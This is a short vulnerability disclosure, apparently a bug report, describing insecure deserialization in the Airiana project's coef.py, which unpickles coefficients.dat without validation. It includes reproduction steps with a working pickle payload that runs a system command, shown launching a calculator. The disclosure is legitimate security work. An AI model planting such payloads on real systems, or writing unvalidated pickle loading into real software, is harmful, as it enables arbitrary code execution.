### Key Information #### Vulnerability Description - **Vulnerability Type**: Insecure Deserialization - **Impact**: Remote Code Execution (RCE) via `pickle.load()` #### Vulnerability Cause - The script loads data from the `coefficients.dat` file using Python’s `pickle.load()` method. - No validation is performed on the file content, allowing attackers to replace the `.dat` file with a malicious payload to execute arbitrary code. #### Vulnerable Code ```python file = open("coefficients.dat", "rb") a = pickle.load(file) ``` #### Reproduction Steps 1. Clone the repository: `git clone https://github.com/BeamCtrl/Airiana` 2. Navigate to the directory: `cd Airiana` 3. Create a malicious `coefficients.dat` file: ```python import pickle import os class Evil: def __reduce__(self): return (os.system, ("gnome-calculator",)) # Replace with any system command payload = pickle.dumps(Evil()) with open("coefficients.dat", "wb") as f: f.write(payload) ``` 4. Run the vulnerable script: `python3 coef.py` 5. Observe the result: The calculator or any arbitrary system command will be executed. #### Evidence - A video recording is provided, showing the calculator being launched.